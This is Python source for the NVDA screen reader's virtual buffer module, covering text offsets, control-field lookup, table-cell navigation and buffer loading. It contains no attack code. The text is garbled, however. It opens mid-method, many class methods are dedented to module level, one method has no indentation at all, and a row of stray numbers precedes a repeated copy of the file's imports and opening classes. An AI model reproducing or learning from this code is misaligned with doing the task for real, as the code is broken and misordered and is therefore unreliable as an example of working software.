                        > int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
                    return True
            except (KeyError, ValueError, TypeError):
                return False
        return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
    def _getControlFieldAttribs(self, docHandle, id):
        """Return the attributes dict of the control field identified by
        (docHandle, id) that encloses this info's position.

        :raises LookupError: if no matching control field encloses the position.
        """
        info = self.copy()
        info.expand(textInfos.UNIT_CHARACTER)
        # Scan the controlStart commands in reverse document order so the
        # innermost enclosing field is checked first.
        for field in reversed(info.getTextWithFields()):
            if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
                # Not a control field.
                continue
            attrs = field.field
            if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
                return attrs
        raise LookupError
    def _getFieldIdentifierFromOffset(self, offset):
        """Return the (docHandle, ID) identifier of the control field node at
        *offset* in the buffer.

        :raises LookupError: if no control field node exists at the offset.
        """
        startOffset = ctypes.c_int()
        endOffset = ctypes.c_int()
        docHandle = ctypes.c_int()
        ID = ctypes.c_int()
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
        # Both outputs staying zero means the lookup found nothing.
        if not any((docHandle.value, ID.value)):
            raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
        return docHandle.value, ID.value
    def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
        """Return the (start, end) buffer offsets of the control field node
        identified by (docHandle, ID).

        :raises LookupError: if no such node exists in the buffer.
        """
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
        if not node:
            raise LookupError
        start = ctypes.c_int()
        end = ctypes.c_int()
        NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
        return start.value, end.value
    def _getBoundingRectFromOffset(self,offset):
        """Return the screen location of the NVDAObject rendered at *offset*.

        :raises LookupError: if no object exists at the offset, or it has no
            usable screen location (off screen/invisible).
        """
        o = self._getNVDAObjectFromOffset(offset)
        if not o:
            raise LookupError("no NVDAObject at offset %d" % offset)
        if o.hasIrrelevantLocation:
            raise LookupError("Object is off screen, invisible or has no location")
        return o.location
    def _getNVDAObjectFromOffset(self,offset):
        """Return the NVDAObject rendered at *offset*, or None if the offset
        cannot be resolved to a control identifier."""
        try:
            docHandle,ID=self._getFieldIdentifierFromOffset(offset)
        except LookupError:
            log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
            return None
        return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
    def _getOffsetsFromNVDAObjectInBuffer(self,obj):
        """Return the (start, end) buffer offsets spanned by *obj*'s rendering
        in this buffer (propagates LookupError if *obj* isn't rendered here)."""
        docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
        return self._getOffsetsFromFieldIdentifier(docHandle,ID)
    def _getOffsetsFromNVDAObject(self, obj):
        """Return buffer offsets for *obj*, falling back to an eligible
        container (list/combo box/grouping/tree view) when the object itself
        is not rendered into the buffer.

        :raises LookupError: if neither the object nor an eligible ancestor
            is rendered in the buffer.
        """
        while True:
            try:
                return self._getOffsetsFromNVDAObjectInBuffer(obj)
            except LookupError:
                pass
            # Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
            # Use the container in this case.
            obj = obj.parent
            if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
                break
        raise LookupError
    def __init__(self,obj,position):
        # Store the owning virtual buffer before the base class resolves the
        # position, as the offset helpers below read self.obj.VBufHandle.
        self.obj=obj
        super(VirtualBufferTextInfo,self).__init__(obj,position)
    def _getSelectionOffsets(self):
        """Return the buffer's current (start, end) selection offsets."""
        start=ctypes.c_int()
        end=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
        return start.value,end.value
    def _setSelectionOffsets(self,start,end):
        """Set the buffer's selection to the given (start, end) offsets."""
        NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
    def _getCaretOffset(self):
        # The caret position is the start of the selection.
        return self._getSelectionOffsets()[0]
    def _setCaretOffset(self,offset):
        # Moving the caret collapses the selection to a single offset.
        return self._setSelectionOffsets(offset,offset)
    def _getStoryLength(self):
        """Return the total length of the buffer's text."""
        return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
    def _getTextRange(self,start,end):
        """Return the plain text between *start* and *end*; "" for an empty
        range or when the helper returns nothing."""
        if start==end:
            return u""
        return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
    def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
        """Gets the placeholder attribute to be used.
        @param attrs: the control field's attributes dict.
        @param placeholderAttrsKey: key under which the placeholder is stored in C{attrs}.
        @return: The placeholder attribute when there is no content within the ControlField.
        None when the ControlField has content.
        @note: The content is considered empty if it holds a single space.
        """
        placeholder = attrs.get(placeholderAttrsKey)
        # For efficiency, only check if it is valid to return placeholder when we have a placeholder value to return.
        if not placeholder:
            return None
        # Get the start and end offsets for the field. This can be used to check if the field has any content.
        try:
            start, end = self._getOffsetsFromFieldIdentifier(
                int(attrs.get('controlIdentifier_docHandle')),
                int(attrs.get('controlIdentifier_ID')))
        except (LookupError, ValueError):
            # If the field can't be located, err on the side of showing the placeholder.
            log.debugWarning("unable to get offsets used to fetch content")
            return placeholder
        else:
            valueLen = end - start
            if not valueLen: # value is empty, use placeholder
                return placeholder
            # Because fetching the content of the field could result in a large amount of text
            # we only do it in order to check for space.
            # We first compare the length by comparing the offsets, if the length is less than 2 (ie
            # could hold space)
            if valueLen < 2:
                controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
                if not controlFieldText or controlFieldText == ' ':
                    return placeholder
        return None
def _getFieldsInRange(self,start,end):
    """Fetch text plus control/format field commands between two buffer offsets,
    normalising each field's attributes on the way through."""
    text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
    if not text:
        return ""
    # The buffer serialises fields as XML; parse into strings and field commands.
    commandList=XMLFormatting.XMLTextParser().parse(text)
    for index in range(len(commandList)):
        if isinstance(commandList[index],textInfos.FieldCommand):
            field=commandList[index].field
            if isinstance(field,textInfos.ControlField):
                commandList[index].field=self._normalizeControlField(field)
            elif isinstance(field,textInfos.FormatField):
                commandList[index].field=self._normalizeFormatField(field)
    return commandList
def getTextWithFields(self,formatConfig=None):
    """Return this range's content as a list of text strings and field commands.

    @param formatConfig: accepted for interface compatibility; not used here.
    """
    startOffset = self._startOffset
    endOffset = self._endOffset
    # An empty range has no text and no fields at all.
    return "" if startOffset == endOffset else self._getFieldsInRange(startOffset, endOffset)
def _getWordOffsets(self,offset):
    # Use VBuf_getLineOffsets without screen layout to find the range of the current field.
    lineStart=ctypes.c_int()
    lineEnd=ctypes.c_int()
    NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
    word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
    # Clamp the word to the current field so it never spans a field boundary.
    return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
    # Line boundaries honour the user's max line length and screen layout settings.
    lineStart=ctypes.c_int()
    lineEnd=ctypes.c_int()
    NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
    return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
    # A paragraph is an unbounded line (no length limit) with screen layout forced on.
    lineStart=ctypes.c_int()
    lineEnd=ctypes.c_int()
    NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
    return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
    """Convert a raw control field's string attributes into typed values and
    derive extra attributes (table header text, uniqueID) for presentation."""
    tableLayout=attrs.get('table-layout')
    if tableLayout:
        attrs['table-layout']=tableLayout=="1"
    # convert some table attributes to ints
    for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
        attrVal=attrs.get(attr)
        if attrVal is not None:
            attrs[attr]=int(attrVal)
    isHidden=attrs.get('isHidden')
    if isHidden:
        attrs['isHidden']=isHidden=="1"
    # Handle table row and column headers.
    for axis in "row", "column":
        attr = attrs.pop("table-%sheadercells" % axis, None)
        if not attr:
            continue
        # Header cell identifiers are serialised as "docHandle,ID" pairs separated by ";".
        cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
        # Get the text for the header cells.
        textList = []
        for docHandle, ID in cellIdentifiers:
            try:
                start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
            except (LookupError, ValueError):
                continue
            textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
        attrs["table-%sheadertext" % axis] = "\n".join(textList)
    if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
        attrs['alwaysReportName'] = True
    # Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
    docHandle=attrs.get('controlIdentifier_docHandle')
    ID=attrs.get('controlIdentifier_ID')
    if docHandle is not None and ID is not None:
        attrs['uniqueID']=(docHandle,ID)
    return attrs
def _normalizeFormatField(self, attrs):
strippedCharsFromStart = attrs.get("strippedCharsFromStart")
if strippedCharsFromStart is not None:
assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
return attrs
def _getLineNumFromOffset(self, offset):
    # Line numbers are not exposed by virtual buffers.
    return None
def _get_fieldIdentifierAtStart(self):
    # (docHandle, ID) of the control field at the start of this range.
    return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
    """Resolve virtual-buffer-specific units (control field / format field) to
    buffer offsets; any other unit is deferred to the base class."""
    if unit == textInfos.UNIT_CONTROLFIELD:
        startOffset=ctypes.c_int()
        endOffset=ctypes.c_int()
        docHandle=ctypes.c_int()
        ID=ctypes.c_int()
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
        return startOffset.value,endOffset.value
    elif unit == textInfos.UNIT_FORMATFIELD:
        startOffset=ctypes.c_int()
        endOffset=ctypes.c_int()
        node=VBufRemote_nodeHandle_t()
        NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
        return startOffset.value,endOffset.value
    return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
    """Return this range's text suitable for the clipboard.

    Blocks should start on a new line but don't necessarily carry an
    end-of-line indicator, so fetch paragraph-sized chunks and join them
    explicitly with CRLF.
    """
    chunks = self.getTextInChunks(textInfos.UNIT_PARAGRAPH)
    return "\r\n".join(chunk.strip("\r\n") for chunk in chunks)
def activate(self):
    # Delegate activation (e.g. following a link) to the owning buffer.
    self.obj._activatePosition(info=self)
def getMathMl(self, field):
    """Fetch the MathML markup for a math control field via its NVDAObject."""
    docHandle = int(field["controlIdentifier_docHandle"])
    nodeId = int(field["controlIdentifier_ID"])
    obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
    return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
    """A browse mode tree interceptor whose content is rendered into a
    remote virtual buffer managed by nvdaHelper.
    Subclasses must implement L{getNVDAObjectFromIdentifier} and
    L{getIdentifierFromNVDAObject}.
    """

    TextInfo=VirtualBufferTextInfo
    #: Maps root identifiers (docHandle and ID) to buffers.
    rootIdentifiers = weakref.WeakValueDictionary()

    def __init__(self,rootNVDAObject,backendName=None):
        super(VirtualBuffer,self).__init__(rootNVDAObject)
        # Name of the nvdaHelper backend used to render this document.
        self.backendName=backendName
        # Handle to the remote buffer; None until loaded.
        self.VBufHandle=None
        self.isLoading=False
        self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
        self.rootIdentifiers[self.rootDocHandle, self.rootID] = self

    def prepare(self):
        """Load the buffer once nvdaHelper has been injected into the target process."""
        if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
            # #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
            # So at very least don't try to prepare a virtualBuffer as it will fail.
            # The user will most likely need to manually move focus away and back again to allow this virtualBuffer to work.
            log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
            return
        self.shouldPrepare=False
        self.loadBuffer()

    def _get_shouldPrepare(self):
        # Only prepare when we neither have a buffer nor are mid-load.
        return not self.isLoading and not self.VBufHandle

    def terminate(self):
        super(VirtualBuffer,self).terminate()
        if not self.VBufHandle:
            return
        self.unloadBuffer()

    def _get_isReady(self):
        return bool(self.VBufHandle and not self.isLoading)

    def loadBuffer(self):
        """Start loading the remote buffer on a background thread."""
        self.isLoading = True
        # Announce progress if loading takes longer than a second.
        self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
        threading.Thread(
            name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
            target=self._loadBuffer).start()

    def _loadBuffer(self):
        # Runs on a background thread; completion is marshalled back to the
        # main thread via the event queue.
        try:
            if log.isEnabledFor(log.DEBUG):
                startTime = time.time()
            self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
                self.rootNVDAObject.appModule.helperLocalBindingHandle,
                self.rootDocHandle,self.rootID,
                self.backendName
            )
            if not self.VBufHandle:
                raise RuntimeError("Could not remotely create virtualBuffer")
        except Exception:
            log.error("", exc_info=True)
            queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
            return
        if log.isEnabledFor(log.DEBUG):
            log.debug("Buffer load took %.3f sec, %d chars" % (
                time.time() - startTime,
                NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
        queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)

    def _loadBufferDone(self, success=True):
        self._loadProgressCallLater.Stop()
        del self._loadProgressCallLater
        self.isLoading = False
        if not success:
            # Fall back to focus mode so the document remains usable.
            self.passThrough=True
            return
        if self._hadFirstGainFocus:
            # If this buffer has already had focus once while loaded, this is a refresh.
            # Translators: Reported when a page reloads (example: after refreshing a webpage).
            ui.message(_("Refreshed"))
        if api.getFocusObject().treeInterceptor == self:
            self.event_treeInterceptor_gainFocus()

    def _loadProgress(self):
        # Translators: Reported while loading a document.
        ui.message(_("Loading document..."))

    def unloadBuffer(self):
        """Destroy the remote buffer, tolerating a remote process that has died."""
        if self.VBufHandle is not None:
            try:
                watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
            except WindowsError:
                pass
            self.VBufHandle=None

    def isNVDAObjectPartOfLayoutTable(self,obj):
        """Return whether obj lives inside a table marked as a layout (non-data) table.
        Checks the object's own field first, then the enclosing table's field."""
        docHandle,ID=self.getIdentifierFromNVDAObject(obj)
        ID=str(ID)
        info=self.makeTextInfo(obj)
        info.collapse()
        info.expand(textInfos.UNIT_CHARACTER)
        fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
        tableLayout=None
        tableID=None
        for fieldCommand in fieldCommands:
            fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
            if fieldID==ID:
                tableLayout=fieldCommand.field.get('table-layout')
                if tableLayout is not None:
                    return tableLayout
                tableID=fieldCommand.field.get('table-id')
                break
        if tableID is None:
            return False
        for fieldCommand in fieldCommands:
            fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
            if fieldID==tableID:
                tableLayout=fieldCommand.field.get('table-layout',False)
                break
        return tableLayout

    @abstractmethod
    def getNVDAObjectFromIdentifier(self, docHandle, ID):
        """Retrieve an NVDAObject for a given node identifier.
        Subclasses must override this method.
        @param docHandle: The document handle.
        @type docHandle: int
        @param ID: The ID of the node.
        @type ID: int
        @return: The NVDAObject.
        @rtype: L{NVDAObjects.NVDAObject}
        """
        raise NotImplementedError

    @abstractmethod
    def getIdentifierFromNVDAObject(self,obj):
        """Retrieves the virtualBuffer field identifier from an NVDAObject.
        @param obj: the NVDAObject to retrieve the field identifier from.
        @type obj: L{NVDAObject}
        @return: the field identifier as a doc handle and ID pair.
        @rtype: 2-tuple.
        """
        raise NotImplementedError

    def script_refreshBuffer(self,gesture):
        if scriptHandler.isScriptWaiting():
            # This script may cause subsequently queued scripts to fail, so don't execute.
            return
        self.unloadBuffer()
        self.loadBuffer()
    # Translators: the description for the refreshBuffer script on virtualBuffers.
    script_refreshBuffer.__doc__ = _("Refreshes the document content")

    def script_toggleScreenLayout(self,gesture):
        config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
        if config.conf["virtualBuffers"]["useScreenLayout"]:
            # Translators: Presented when use screen layout option is toggled.
            ui.message(_("Use screen layout on"))
        else:
            # Translators: Presented when use screen layout option is toggled.
            ui.message(_("Use screen layout off"))
    # Translators: the description for the toggleScreenLayout script on virtualBuffers.
    script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")

    def _searchableAttribsForNodeType(self,nodeType):
        """Return the attribute spec used to find nodes of the given type,
        or None when the type is unsupported (subclasses override this).
        Fix: this hook was previously defined as C{_searchableAttributesForNodeType},
        a name L{_iterNodesByType} never calls; it now matches the call site.
        """
        pass
    # Backward-compatible alias preserving the old (misspelled) attribute name.
    _searchableAttributesForNodeType = _searchableAttribsForNodeType

    def _iterNodesByType(self,nodeType,direction="next",pos=None):
        attribs=self._searchableAttribsForNodeType(nodeType)
        if not attribs:
            raise NotImplementedError
        return self._iterNodesByAttribs(attribs, direction, pos,nodeType)

    def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
        """Yield L{VirtualBufferQuickNavItem}s matching an attribute spec,
        walking the buffer in the given direction starting from pos."""
        offset=pos._startOffset if pos else -1
        reqAttrs, regexp = _prepareForFindByAttributes(attribs)
        startOffset=ctypes.c_int()
        endOffset=ctypes.c_int()
        if direction=="next":
            direction=VBufStorage_findDirection_forward
        elif direction=="previous":
            direction=VBufStorage_findDirection_back
        elif direction=="up":
            direction=VBufStorage_findDirection_up
        else:
            raise ValueError("unknown direction: %s"%direction)
        while True:
            try:
                node=VBufRemote_nodeHandle_t()
                NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
            except Exception:
                return
            if not node:
                return
            yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
            # NOTE(review): the c_int object itself is reused as the next offset;
            # ctypes converts it for the foreign call, but .value may have been intended.
            offset=startOffset

    def _getTableCellAt(self,tableID,startPos,row,column):
        """Return the first cell TextInfo at exactly (row, column) in the table.
        @raise LookupError: if there is no such cell.
        """
        try:
            return next(self._iterTableCells(tableID,row=row,column=column))
        except StopIteration:
            raise LookupError

    def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
        """Yield TextInfos for cells of a table, optionally filtered by row/column."""
        attrs = {"table-id": [str(tableID)]}
        # row could be 0.
        if row is not None:
            attrs["table-rownumber"] = [str(row)]
        if column is not None:
            attrs["table-columnnumber"] = [str(column)]
        results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
        if not startPos and not row and not column and direction == "next":
            # The first match will be the table itself, so skip it.
            next(results)
        for item in results:
            yield item.textInfo

    def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
        """Find the cell adjacent to (origRow, origCol) along the given axis and
        movement direction, accounting for cells spanning multiple rows/columns.
        @raise LookupError: if no suitable cell exists.
        """
        # Determine destination row and column.
        destRow = origRow
        destCol = origCol
        if axis == "row":
            destRow += origRowSpan if movement == "next" else -1
        elif axis == "column":
            destCol += origColSpan if movement == "next" else -1
        if destCol < 1:
            # Optimisation: We're definitely at the edge of the column.
            raise LookupError
        # Optimisation: Try searching for exact destination coordinates.
        # This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
        try:
            return self._getTableCellAt(tableID,startPos,destRow,destCol)
        except LookupError:
            pass
        # Cells are grouped by row, so in most cases, we simply need to search in the right direction.
        for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
            _ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
            if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
                return info
            elif row > destRow and movement == "next":
                # Optimisation: We've gone forward past destRow, so we know we won't find the cell.
                # We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
                break
        if axis == "row" or (axis == "column" and movement == "previous"):
            # In most cases, there's nothing more to try.
            raise LookupError
        else:
            # We're moving forward by column.
            # In this case, there might be a cell on an earlier row which spans multiple rows.
            # Therefore, try searching backwards.
            for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
                _ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
                if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
                    return info
            else:
                raise LookupError

    def _isSuitableNotLinkBlock(self, textRange):
        # A text range only qualifies as a "block with no links" when long enough.
        return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN

    def getEnclosingContainerRange(self, textRange):
        """Return a TextInfo covering the innermost container (list, table, etc.)
        or landmark enclosing textRange, or None when there is none."""
        formatConfig=config.conf['documentFormatting'].copy()
        formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
        controlFields=[]
        for cmd in textRange.getTextWithFields():
            if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
                break
            controlFields.append(cmd.field)
        containerField=None
        # Walk outwards from the innermost field looking for a container or landmark.
        while controlFields:
            field=controlFields.pop()
            if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
                containerField=field
                break
        if not containerField:
            return None
        docHandle=int(containerField['controlIdentifier_docHandle'])
        ID=int(containerField['controlIdentifier_ID'])
        offsets = textRange._getOffsetsFromFieldIdentifier(docHandle,ID)
        return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))

    @classmethod
    def changeNotify(cls, rootDocHandle, rootID):
        """Called when a buffer's content changes; queues an update on the owning buffer."""
        try:
            queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
        except KeyError:
            pass

    def _handleUpdate(self):
        """Handle an update to this buffer.
        """
        if not self.VBufHandle:
            # #4859: The buffer was unloaded after this method was queued.
            return
        braille.handler.handleUpdate(self)

    def getControlFieldForNVDAObject(self, obj):
        """Return the normalized control field belonging to obj.
        @raise LookupError: if obj has no field in this buffer.
        """
        docHandle, objId = self.getIdentifierFromNVDAObject(obj)
        objId = str(objId)
        info = self.makeTextInfo(obj)
        info.collapse()
        info.expand(textInfos.UNIT_CHARACTER)
        for item in info.getTextWithFields():
            if not isinstance(item, textInfos.FieldCommand) or not item.field:
                continue
            fieldId = item.field.get("controlIdentifier_ID")
            if fieldId == objId:
                return item.field
        raise LookupError

    def _isNVDAObjectInApplication_noWalk(self, obj):
        inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
        if inApp is not None:
            return inApp
        # If the object is in the buffer, it's definitely not in an application.
        try:
            docHandle, objId = self.getIdentifierFromNVDAObject(obj)
        except Exception:
            log.debugWarning("getIdentifierFromNVDAObject failed. "
                "Object probably died while walking ancestors.", exc_info=True)
            return None
        node = VBufRemote_nodeHandle_t()
        if not self.VBufHandle:
            return None
        try:
            NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId,ctypes.byref(node))
        except WindowsError:
            return None
        if node:
            return False
        return None

    __gestures = {
        "kb:NVDA+f5": "refreshBuffer",
        "kb:NVDA+v": "toggleScreenLayout",
    }
| 38.906722
| 212
| 0.741776
|
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
# Search directions accepted by VBuf_findNodeByAttributes.
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
# Remote virtual buffer node handles are 64-bit values.
VBufRemote_nodeHandle_t=ctypes.c_ulonglong


class VBufStorage_findMatch_word(str):
    # Marker subclass of str: match this value as a whole word rather than exactly.
    pass
# Sentinel: the attribute must be present with any non-empty value.
VBufStorage_findMatch_notEmpty = object()

# Translation table used to escape attribute values before they are embedded in
# the regular expression handed to the buffer's find function (see
# _prepareForFindByAttributes).
FINDBYATTRIBS_ESCAPE_TABLE = {
    ord(u":"): r"\\:",
    ord(u";"): r"\\;",
    ord(u"\\"): u"\\\\\\\\",
}
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
    """Compile an attribute specification into the (names, regexp) string pair
    consumed by VBuf_findNodeByAttributes.
    @param attribs: a dict (or sequence of dicts treated as alternatives)
        mapping attribute names to lists of acceptable values; values may use
        the VBufStorage_findMatch_word / VBufStorage_findMatch_notEmpty markers.
    @return: a space-separated attribute-name string and an alternation regexp.
    """
    # Escape values so they match literally within the buffer's serialised
    # "name:value;" attribute format.
    escape = lambda val: str(val).translate(FINDBYATTRIBS_ESCAPE_TABLE)
    reqAttrs = []
    regexp = []
    if isinstance(attribs, dict):
        attribs = (attribs,)
    # Gather the attribute names across all alternatives.
    for option in attribs:
        for name in option:
            reqAttrs.append(name)
    for option in attribs:
        optRegexp = []
        for name in reqAttrs:
            optRegexp.append("%s:" % escape(name))
            values = option.get(name)
            if not values:
                # Any value (or none) is acceptable for this attribute.
                optRegexp.append(r"(?:\\;|[^;])*;")
            elif values[0] is VBufStorage_findMatch_notEmpty:
                # There must be a value for this attribute.
                optRegexp.append(r"(?:\\;|[^;])+;")
            elif isinstance(values[0], VBufStorage_findMatch_word):
                # Assume all are word matches.
                optRegexp.append(r"(?:\\;|[^;])*\b(?:")
                optRegexp.append("|".join(escape(val) for val in values))
                optRegexp.append(r")\b(?:\\;|[^;])*;")
            else:
                # Assume all are exact matches or None (must not exist).
                optRegexp.append("(?:" )
                optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
                optRegexp.append(")")
        regexp.append("".join(optRegexp))
    return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
    """A quick-navigation item backed by a control field node in a virtual buffer."""

    def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
        textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
        super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
        # Resolve the node back to its (docHandle, ID) identifier for later lookups.
        docHandle=ctypes.c_int()
        ID=ctypes.c_int()
        NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
        self.vbufFieldIdentifier=(docHandle.value,ID.value)
        self.vbufNode=vbufNode

    @property
    def obj(self):
        # The NVDAObject this item represents, resolved on demand.
        return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)

    @property
    def label(self):
        attrs = {}
        def propertyGetter(prop):
            if not attrs:
                # Lazily fetch the attributes the first time they're needed.
                attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
            return attrs.get(prop)
        return self._getLabelForProperties(propertyGetter)

    def isChild(self,parent):
        # A heading counts as a child of another heading when its level is deeper.
        if self.itemType == "heading":
            try:
                if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
                        > int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
                    return True
            except (KeyError, ValueError, TypeError):
                return False
        return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
